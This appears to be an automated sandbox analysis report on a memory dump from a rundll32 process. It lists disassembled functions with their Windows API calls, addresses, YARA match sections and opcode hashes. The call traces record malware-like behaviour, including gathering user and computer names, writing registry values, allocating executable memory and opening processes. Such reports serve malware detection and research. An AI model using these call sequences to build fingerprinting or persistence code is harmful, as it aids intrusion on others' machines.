                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          APIs
                                                          • lstrlenW.KERNEL32(00000000,?,06899A2B,?,?,06899A2B,?,?,06899A2B,?,?,06899A2B,?,00000000,00000000,00000000), ref: 0628CC58
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 0628CC7B
                                                          • lstrcatW.KERNEL32(00000000,00000000), ref: 0628CC83
                                                          • lstrlenW.KERNEL32(00000000,?,06899A2B,?,?,06899A2B,?,?,06899A2B,?,?,06899A2B,?,?,06899A2B,?), ref: 0628CCCE
                                                          • memcpy.NTDLL(00000000,?,?,?), ref: 0628CD36
                                                          • LocalFree.KERNEL32(?,?), ref: 0628CD4F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
                                                          • String ID: P
                                                          • API String ID: 3649579052-3110715001
                                                          • Opcode ID: 4db5d4adc6573309f896d0ef2eef74368f2b256b583daaf87f4b0e3a473d6ba1
                                                          • Instruction ID: 323dac911d78b0e7f4d3f582a95323c6e1eaaae201bb54a2aaca8bf8de6ab4d6
                                                          • Opcode Fuzzy Hash: 4db5d4adc6573309f896d0ef2eef74368f2b256b583daaf87f4b0e3a473d6ba1
                                                          • Instruction Fuzzy Hash: A7616E71E1120AAFDF51FFA8DC88DAEBBB9EF89344B044425EA14A7290D7349945CF70
                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          APIs
                                                            • Part of subcall function 0629148E: InterlockedIncrement.KERNEL32(00000018), ref: 062914DF
                                                            • Part of subcall function 0629148E: RtlLeaveCriticalSection.NTDLL(0689C398), ref: 0629156A
                                                          • OpenProcess.KERNEL32(00000410,B8F475FF,06282289,00000000,00000000,06282289,0000001C,00000000,00000000,?,?,?,06282289), ref: 0628C5BD
                                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,06282299,00000104,?,?,?,06282289), ref: 0628C5DB
                                                          • GetSystemTimeAsFileTime.KERNEL32(06282289), ref: 0628C643
                                                          • lstrlenW.KERNEL32(C78BC933), ref: 0628C6B8
                                                          • GetSystemTimeAsFileTime.KERNEL32(00000008,0000001A), ref: 0628C6D4
                                                          • memcpy.NTDLL(00000014,C78BC933,00000002), ref: 0628C6EC
                                                            • Part of subcall function 0627F307: RtlLeaveCriticalSection.NTDLL(?), ref: 0627F384
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Time$CriticalFileLeaveSectionSystem$CloseHandleIncrementInterlockedOpenProcesslstrlenmemcpy
                                                          • String ID: o
                                                          • API String ID: 2541713525-252678980
                                                          • Opcode ID: 2346c133b6d0d5401def7101ad730b23c1576a8bae825af3822e26a383f28db6
                                                          • Instruction ID: 91a7ad4d191676d5232c5f1fd826087b9017f9f755a142e4432187a04026bc19
                                                          • Opcode Fuzzy Hash: 2346c133b6d0d5401def7101ad730b23c1576a8bae825af3822e26a383f28db6
                                                          • Instruction Fuzzy Hash: 8851BF71B21717AFDB51EF64DC88BAAB7A9FF48304F144529EA05D7280D770E980CBA4
                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          APIs
                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 0627A391
                                                          • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0627A3BD
                                                          • _allmul.NTDLL(?,?,FFFFD8F0,000000FF), ref: 0627A3CD
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,FFFFD8F0,000000FF), ref: 0627A405
                                                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,FFFFD8F0,000000FF), ref: 0627A427
                                                          • GetShellWindow.USER32 ref: 0627A436
                                                            • Part of subcall function 06282986: GetShellWindow.USER32 ref: 062829A4
                                                            • Part of subcall function 06282986: GetVersion.KERNEL32 ref: 06282A46
                                                            • Part of subcall function 06282986: GetVersion.KERNEL32 ref: 06282A54
                                                          • GetLastError.KERNEL32(?), ref: 0627A521
                                                          • CloseHandle.KERNEL32(?), ref: 0627A535
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: TimerWaitable$ShellVersionWindow$CloseCreateErrorHandleLastMultipleObjectsWait_allmul
                                                          • String ID:
                                                          • API String ID: 2436285880-0
                                                          • Opcode ID: 44b58c0f151412f96cb5637a5421cb0a9c12782a7e8034e6e326d2bd54adddb4
                                                          • Instruction ID: 2769f5a9b8b8821a91ab983449d7460b6b4c7eefc72bc30c61a5bf06c395f9f4
                                                          • Opcode Fuzzy Hash: 44b58c0f151412f96cb5637a5421cb0a9c12782a7e8034e6e326d2bd54adddb4
                                                          • Instruction Fuzzy Hash: 967147B1918306AFD750DF64D888C6FBBE9FB88364F004A2EF99597290D730D9458B62
                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          APIs
                                                            • Part of subcall function 0628B7A4: RegCreateKeyA.ADVAPI32(80000001,0689B7F0,?), ref: 0628B7B9
                                                            • Part of subcall function 0628B7A4: lstrlen.KERNEL32(0689B7F0,00000000,00000000,00000000,?,0628A2EB,00000001,?,00000000,00000000,00000000,?,0627109E,06299F2C,00000008,00000003), ref: 0628B7E2
                                                          • RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 06277AA6
                                                          • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 06277ABE
                                                          • HeapFree.KERNEL32(00000000,?,?,062887CC,?,?), ref: 06277B20
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 06277B34
                                                          • WaitForSingleObject.KERNEL32(00000000,?,062887CC,?,?), ref: 06277B86
                                                          • HeapFree.KERNEL32(00000000,?,?,062887CC,?,?), ref: 06277BAF
                                                          • HeapFree.KERNEL32(00000000,?,?,062887CC,?,?), ref: 06277BBF
                                                          • RegCloseKey.ADVAPI32(?,?,062887CC,?,?), ref: 06277BC8
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
                                                          • String ID:
                                                          • API String ID: 3503961013-0
                                                          • Opcode ID: 570d8c3f4f28cdb5d190bd12ca995c47dab5523392dfb0fb846a3a2bc3ff8aa0
                                                          • Instruction ID: fb267f11fbd2f0a413c3caabab63bf1e0ca65a463c0a6b5a86cdd8410a9c059c
                                                          • Opcode Fuzzy Hash: 570d8c3f4f28cdb5d190bd12ca995c47dab5523392dfb0fb846a3a2bc3ff8aa0
                                                          • Instruction Fuzzy Hash: FF41D6B5D1020AEFDF419FA4DC88CEEBB7AFF48354F10546AEA15A2210D3355A94DF60
                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,0627A1A1), ref: 0627AAC5
                                                          • wsprintfA.USER32 ref: 0627AAED
                                                          • lstrlen.KERNEL32(?), ref: 0627AAFC
                                                            • Part of subcall function 0628E803: RtlFreeHeap.NTDLL(00000000,?,06283953,?,?,0628BF5B,00000000,00000000,062710B0,00000000,06299F2C,00000008,00000003), ref: 0628E80F
                                                          • wsprintfA.USER32 ref: 0627AB3C
                                                          • wsprintfA.USER32 ref: 0627AB71
                                                          • memcpy.NTDLL(00000000,?,?), ref: 0627AB7E
                                                          • memcpy.NTDLL(00000008,062953E8,00000002,00000000,?,?), ref: 0627AB93
                                                          • wsprintfA.USER32 ref: 0627ABB6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
                                                          • String ID:
                                                          • API String ID: 2937943280-0
                                                          • Opcode ID: bc8c0848d49e26b90290b1f72446ad23b68e083285c1838e46047d3cb8b09649
                                                          • Instruction ID: 67e265b5dd5013989ed49c069105086079eef55adab4d08cbb61469d628d89f6
                                                          • Opcode Fuzzy Hash: bc8c0848d49e26b90290b1f72446ad23b68e083285c1838e46047d3cb8b09649
                                                          • Instruction Fuzzy Hash: 40413D71A1020AEFDB50DFA9D884EAEB7FDEF48318B144455E919E7211EB30EA05CB60
                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 062916F0
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 06291703
                                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 06291715
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,06286C8E), ref: 06291739
                                                          • GetComputerNameW.KERNEL32(00000000,?), ref: 06291747
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0629175E
                                                          • GetComputerNameW.KERNEL32(00000000,?), ref: 0629176F
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,06286C8E), ref: 06291795
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HeapName$AllocateComputerFreeUser
                                                          • String ID:
                                                          • API String ID: 3239747167-0
                                                          • Opcode ID: bae6e46585d06fabc686de01151d418ab5d32965fc308a5530399b94dc8e74ba
                                                          • Instruction ID: ccd05438ec8a1f581559d349c9be547464a7a9bc446a70425ade63450a19808d
                                                          • Opcode Fuzzy Hash: bae6e46585d06fabc686de01151d418ab5d32965fc308a5530399b94dc8e74ba
                                                          • Instruction Fuzzy Hash: 8331E376A1020AEFDB00DFB5DD89DAEB7FAEB882447108469E905D7200E734DD55DF60
                                                          Uniqueness
                                                          • Uniqueness Score: -1.00%
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,0627A7C4,?,?,?,?), ref: 062863F5
                                                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 06286407
                                                          • wcstombs.NTDLL ref: 06286415
                                                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,0627A7C4,?,?,?), ref: 06286439
                                                          • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0628644E
                                                          • mbstowcs.NTDLL ref: 0628645B
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,0627A7C4,?,?,?,?,?), ref: 0628646D
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,0627A7C4,?,?,?,?,?), ref: 06286487
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
                                                          • String ID:
                                                          • API String ID: 316328430-0
                                                          • Opcode ID: 40d9c576972b4d90b328d280ce8ecd7f8f99a34e87fa9d9881ce3f3489fab8ab
                                                          • Instruction ID: efd0bd0bc581d0eaef4610e70e4399c6172ca7b678fc501e4307557bafbecb11
                                                          • Opcode Fuzzy Hash: 40d9c576972b4d90b328d280ce8ecd7f8f99a34e87fa9d9881ce3f3489fab8ab
                                                          • Instruction Fuzzy Hash: 35214F3190130AFFDF219FA5EC09E9E7BBAEB84314F104125BA04A10A0D7719964DF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(0628E453,00000000,00000000,0629A440,?,?,0627F68B,0628E453,00000000,0628E453,0629A420), ref: 0627D935
                                                          • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 0627D943
                                                          • wsprintfA.USER32 ref: 0627D95F
                                                          • RegCreateKeyA.ADVAPI32(80000001,0629A420,00000000), ref: 0627D977
                                                          • lstrlen.KERNEL32(?), ref: 0627D986
                                                          • RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,?,00000001), ref: 0627D994
                                                          • RegCloseKey.ADVAPI32(?), ref: 0627D99F
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0627D9AE
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heaplstrlen$AllocateCloseCreateFreeValuewsprintf
                                                          • String ID:
                                                          • API String ID: 1575615994-0
                                                          • Opcode ID: 9d409cd1f83fa5bdf1279feb1c7158f0a530095acd305356ddaaf1d176f712ed
                                                          • Instruction ID: 8e12e969122bbca2204a2a6142feddaa06daf218b69482f4c1066bec11bf8cf3
                                                          • Opcode Fuzzy Hash: 9d409cd1f83fa5bdf1279feb1c7158f0a530095acd305356ddaaf1d176f712ed
                                                          • Instruction Fuzzy Hash: 77113932600208BFEB029B98FC8DEAA3B7AEB89714F144025FB0496150E6729D54DFB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • OpenProcess.KERNEL32(00000040,00000000,?), ref: 0628FE12
                                                          • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 0628FE30
                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0628FE38
                                                          • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 0628FE56
                                                          • GetLastError.KERNEL32 ref: 0628FE6A
                                                          • RegCloseKey.ADVAPI32(?), ref: 0628FE75
                                                          • CloseHandle.KERNEL32(00000000), ref: 0628FE7C
                                                          • GetLastError.KERNEL32 ref: 0628FE84
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
                                                          • String ID:
                                                          • API String ID: 3822162776-0
                                                          • Opcode ID: 9c899bf5e5c63cce7c5d8c1ca576765ccb27c0abc19fb44f6880b6d3a6161b46
                                                          • Instruction ID: a08f88432f8c86e54ae38021975b1ba7f97c7fff3bae3af94449c686d3873309
                                                          • Opcode Fuzzy Hash: 9c899bf5e5c63cce7c5d8c1ca576765ccb27c0abc19fb44f6880b6d3a6161b46
                                                          • Instruction Fuzzy Hash: 47115E76210309AFEB426FA5EC5CAAA3B6AEF883A1F144014FF05D6281DB71C955CF70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 62b2203faceba28fee21d4099ad645b2be6c5a687b0f5aac9ff227f0e9ab7363
                                                          • Instruction ID: ec5bea8bb0f4958eb2cd02c3cf5deef73097d6267f3df7695ec1c5fe0536589a
                                                          • Opcode Fuzzy Hash: 62b2203faceba28fee21d4099ad645b2be6c5a687b0f5aac9ff227f0e9ab7363
                                                          • Instruction Fuzzy Hash: BDB11271C2022AEFDFA1DBA8DC48AEEBBB5EF05315F044065E910B6160D7359A85CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memcpy.NTDLL(?,?,0000000D,?,?,00000000,?,?,?,?,?,?,?,?,06292801,?), ref: 0629242E
                                                          • memcpy.NTDLL(?,?,0000000D,?,?,0000000D,?,?,00000000), ref: 0629243B
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • memcpy.NTDLL(00000000,?,?,00000008,?,00000001,06292801,00000000,00000001,?,?,?,?,06292801,?,00000000), ref: 062925C9
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: memcpy$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 4068229299-0
                                                          • Opcode ID: 5e3c159f23496f2f5a9ddace7ecb7e8a455c017ec6727d6a1fd3f65a8b044426
                                                          • Instruction ID: 879547d239944d6504918542b0f3c91009790848e716075f271369f81dc1699b
                                                          • Opcode Fuzzy Hash: 5e3c159f23496f2f5a9ddace7ecb7e8a455c017ec6727d6a1fd3f65a8b044426
                                                          • Instruction Fuzzy Hash: 36B11671A3120AFBDF91DE94DD80EEE77A9AF84200F048125ED14AB250EB30DB15CBB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCommandLineA.KERNEL32(062960F0,00000038,0627E22A,00000000,76CDF5B0,06280348,?,00000001,?,?,?,?,?,?,?,06279100), ref: 0627BA7C
                                                          • StrChrA.SHLWAPI(00000000,00000020,?,?,?,?,?,?,?,06279100,?,?,?,?,?), ref: 0627BA8D
                                                            • Part of subcall function 0627D4DA: lstrlen.KERNEL32(?,00000000,76C86980,00000000,0627DA7B,?), ref: 0627D4E3
                                                            • Part of subcall function 0627D4DA: memcpy.NTDLL(00000000,?,00000000,?), ref: 0627D506
                                                            • Part of subcall function 0627D4DA: memset.NTDLL ref: 0627D515
                                                          • ExitProcess.KERNEL32 ref: 0627BC6F
                                                            • Part of subcall function 0627A8E9: StrChrA.SHLWAPI(00000020,?,765BD3B0,0689C304,00000000,?,06276584,?), ref: 0627A90E
                                                            • Part of subcall function 0627A8E9: StrTrimA.SHLWAPI(00000020,06295FCC,00000000,?,06276584,?), ref: 0627A92D
                                                            • Part of subcall function 0627A8E9: StrChrA.SHLWAPI(00000020,?,?,06276584,?), ref: 0627A939
                                                          • lstrcmp.KERNEL32(?,?), ref: 0627BAFB
                                                          • VirtualAlloc.KERNEL32(00000000,0000FFFF,00001000,00000040,?,?,?,?,?,?,?,06279100,?), ref: 0627BB13
                                                            • Part of subcall function 06274BC4: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,0689B7F0,?,?,0628B7F2,0000003A,0689B7F0,?,0628A2EB,00000001,?,00000000,00000000), ref: 06274C04
                                                            • Part of subcall function 06274BC4: CloseHandle.KERNEL32(000000FF,?,?,0628B7F2,0000003A,0689B7F0,?,0628A2EB,00000001,?,00000000,00000000,00000000,?,0627109E,06299F2C), ref: 06274C0F
                                                          • VirtualFree.KERNEL32(?,00000000,00008000,0000004B,00000000,00000000,-00000020,?,?,?,?,?,?,?,06279100,?), ref: 0627BB85
                                                          • lstrcmp.KERNEL32(?,?), ref: 0627BB9E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Virtuallstrcmp$AllocCloseCommandErrorExitFreeHandleLastLineProcessTrimlstrlenmemcpymemset
                                                          • String ID:
                                                          • API String ID: 739714153-0
                                                          • Opcode ID: 6ca47a7aa36300f07097b7a8039d94202017c4bee489b6ec305d35ae2e5b7c1b
                                                          • Instruction ID: 735c93897a3914a71caf3239ffd82fc179a8389a653fb2662b38456cc4f259fe
                                                          • Opcode Fuzzy Hash: 6ca47a7aa36300f07097b7a8039d94202017c4bee489b6ec305d35ae2e5b7c1b
                                                          • Instruction Fuzzy Hash: B2515D71D2021AEFDF91AFA0DC88EEEBBB9EF48702F144019E911A6194DB359941CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 062894B7
                                                          • StrTrimA.SHLWAPI(00000000,?), ref: 062894D4
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 06289507
                                                          • RtlImageNtHeader.NTDLL(00000000), ref: 06289532
                                                          • HeapFree.KERNEL32(00000000,00000000,00000007,00000001,00000000,00000000), ref: 062895F7
                                                            • Part of subcall function 0627D4DA: lstrlen.KERNEL32(?,00000000,76C86980,00000000,0627DA7B,?), ref: 0627D4E3
                                                            • Part of subcall function 0627D4DA: memcpy.NTDLL(00000000,?,00000000,?), ref: 0627D506
                                                            • Part of subcall function 0627D4DA: memset.NTDLL ref: 0627D515
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 062895A8
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 062895D7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
                                                          • String ID:
                                                          • API String ID: 239510280-0
                                                          • Opcode ID: 427a3dfb801595c1d5d5744bf9bd7e1e883c0580ba61a5d689494bfb6609ca51
                                                          • Instruction ID: 139eb264d6fbdb71c49e696ca609c16ca5df70485f4a701fd4480acb668c1c93
                                                          • Opcode Fuzzy Hash: 427a3dfb801595c1d5d5744bf9bd7e1e883c0580ba61a5d689494bfb6609ca51
                                                          • Instruction Fuzzy Hash: C541BA31E21305BFEB526B58DC49FAD7BA9DF84745F104015FE05A71C0DB759A80DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,?,?,00000000,?,?,00000001,00000001,?,06271785,?,?,?,?,?), ref: 0628D6F2
                                                          • lstrlen.KERNEL32(?,?,?,00000000,?,?,00000001,00000001,?,06271785,?,?,?,?,?), ref: 0628D710
                                                          • RtlAllocateHeap.NTDLL(00000000,76C86985,?), ref: 0628D73C
                                                          • memcpy.NTDLL(00000000,00000000,00000000,?,?,00000001,00000001,?,06271785,?,?,?,?,?), ref: 0628D753
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0628D766
                                                          • memcpy.NTDLL(00000000,?,?,?,?,00000001,00000001,?,06271785,?,?,?,?,?), ref: 0628D775
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,00000001,00000001,?,06271785,?,?,?), ref: 0628D7D9
                                                            • Part of subcall function 0627F307: RtlLeaveCriticalSection.NTDLL(?), ref: 0627F384
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
                                                          • String ID:
                                                          • API String ID: 1635816815-0
                                                          • Opcode ID: bcb2a68801a209f53e1355a4a74261fcffba08df82470aac06314a8ac9102c55
                                                          • Instruction ID: af95c94921bab161567d6c11806aa0ffea9460598a8863983bf8e9a52d1fd40c
                                                          • Opcode Fuzzy Hash: bcb2a68801a209f53e1355a4a74261fcffba08df82470aac06314a8ac9102c55
                                                          • Instruction Fuzzy Hash: 6E41B331921219AFDBA2BFA5DC88BAEBBA5EF44350F004825FD04AB1D0D770D958DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlImageNtHeader.NTDLL ref: 062845B6
                                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 062845F9
                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 06284614
                                                          • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?), ref: 0628466A
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 062846C6
                                                          • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 062846D4
                                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 062846DF
                                                            • Part of subcall function 062726D3: RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 062726E7
                                                            • Part of subcall function 062726D3: memcpy.NTDLL(00000000,?,?,?), ref: 06272710
                                                            • Part of subcall function 062726D3: RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 06272739
                                                            • Part of subcall function 062726D3: RegCloseKey.ADVAPI32(?), ref: 06272764
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenValuememcpy
                                                          • String ID:
                                                          • API String ID: 3181710096-0
                                                          • Opcode ID: faed0c3c3e485a8113711cba8c592b3ca6694868a5560056abbcaf807c0172c1
                                                          • Instruction ID: 5a39081413e4c56f72478d592d86d46edb8c72de543009bd3140abf7ec411102
                                                          • Opcode Fuzzy Hash: faed0c3c3e485a8113711cba8c592b3ca6694868a5560056abbcaf807c0172c1
                                                          • Instruction Fuzzy Hash: C741AD32A21317AFDB51BF65EC88F6A3BE9EF84351F044024FE05DA180DB71D950CAA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 06291AED
                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 06291B1B
                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 06291B60
                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 06291B88
                                                          • _strupr.NTDLL ref: 06291BB3
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 06291BC0
                                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 06291BDA
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProcessThread$Window$CloseCurrentHandleOpen_struprlstrlen
                                                          • String ID:
                                                          • API String ID: 3831658075-0
                                                          • Opcode ID: 25b990438db1313fd7a222f4b87b0990beb62c6b7a6fa02cc9509ee3b77218b4
                                                          • Instruction ID: ebc396977b1a56829104308dbf2367362269658d24a191438437887f6b694c0a
                                                          • Opcode Fuzzy Hash: 25b990438db1313fd7a222f4b87b0990beb62c6b7a6fa02cc9509ee3b77218b4
                                                          • Instruction Fuzzy Hash: 0F416071D1031EEBDF219FA5DC49BDEBBBAAF88701F144066EA11A2250D7719690CFB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0628508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 0628509E
                                                            • Part of subcall function 0628508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850B7
                                                            • Part of subcall function 0628508C: GetCurrentThreadId.KERNEL32 ref: 062850C4
                                                            • Part of subcall function 0628508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850D0
                                                            • Part of subcall function 0628508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850DE
                                                            • Part of subcall function 0628508C: lstrcpy.KERNEL32(00000000), ref: 06285100
                                                          • StrChrA.SHLWAPI(?,0000002C,00003219), ref: 06284943
                                                          • StrTrimA.SHLWAPI(?,?), ref: 06284961
